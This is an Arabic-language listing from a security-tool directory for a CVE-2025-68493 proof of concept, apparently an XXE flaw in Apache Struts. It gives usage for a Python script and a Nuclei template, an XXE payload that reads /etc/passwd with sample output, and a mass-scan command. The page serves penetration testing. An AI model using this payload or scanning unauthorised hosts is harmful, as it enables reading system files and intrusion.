Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68493 — CVE-2025-68493 | Kitploit
أدوات/GitHubGitHub/hsltz/cve-2025-68493
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubhsltz/cve-2025-68493

CVE-2025-68493

CVE-2025-68493

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-68493

CVE-2025-68493

7. المراجع

[1] ثغرة ApacheStrutsXWorkXML وCVE-2025-68493 PoC والنصوص البرمجية | ZONE.CI الشبكة العالمية. https://zone.ci/secarticles/wx/486533.html

8. التحقق من الثغرة واستغلالها

للتحقق من ثغرة CVE-2025-68493 واستغلالها، يمكن استخدام سكربت Python PoC وقالب Nuclei YAML الموفرين أدناه.

8.1 طريقة استخدام سكربت Python PoC

اسم السكربت: cve_2025_68493_poc.py

الوظيفة: يُستخدم هذا السكربت للتحقق من الثغرة على هدف واحد، ومحاولة قراءة ملف محدد (افتراضيًا /etc/passwd).

المتطلبات الأساسية:

  • بيئة Python 3
  • مكتبة requests (pip install requests)

وسائط سطر الأوامر:

  • -u, --url: عنوان URL الأساسي للتطبيق المستهدف (مثال: http://127.0.0.1:8080)
  • -f, --file: مسار الملف المستهدف لمحاولة قراءته (افتراضيًا /etc/passwd)

مثال:

root@kitploit:~
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

المخرجات المتوقعة:

إذا كان الهدف يحتوي على الثغرة وتمت قراءة الملف بنجاح، فسيتم عرض محتوى مشابه لما يلي:

root@kitploit:~
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 طريقة استخدام قالب Nuclei YAML

اسم القالب: cve-2025-68493.yaml

الوظيفة: يُستخدم هذا القالب مع أداة Nuclei لإجراء فحص جماعي لعدة أهداف للكشف عن ثغرة CVE-2025-68493.

المتطلبات الأساسية:

  • تثبيت أداة Nuclei (يُنصح بالإصدار v3.x أو أحدث)

وسائط سطر الأوامر:

  • -t: تحديد مسار ملف قالب Nuclei
  • -u: تحديد عنوان URL لهدف واحد
  • -l: تحديد ملف يحتوي على عدة عناوين URL لأهداف متعددة

مثال:

فحص هدف واحد:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -u http://example.com:8080

فحص جماعي:

افترض أن لديك ملفًا باسم targets.txt، حيث يحتوي كل سطر على عنوان URL لهدف:

root@kitploit:~
http://target1.com:8080
http://target2.com:8080

نفّذ الأمر التالي لإجراء الفحص الجماعي:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -l targets.txt
تنزيل الأداة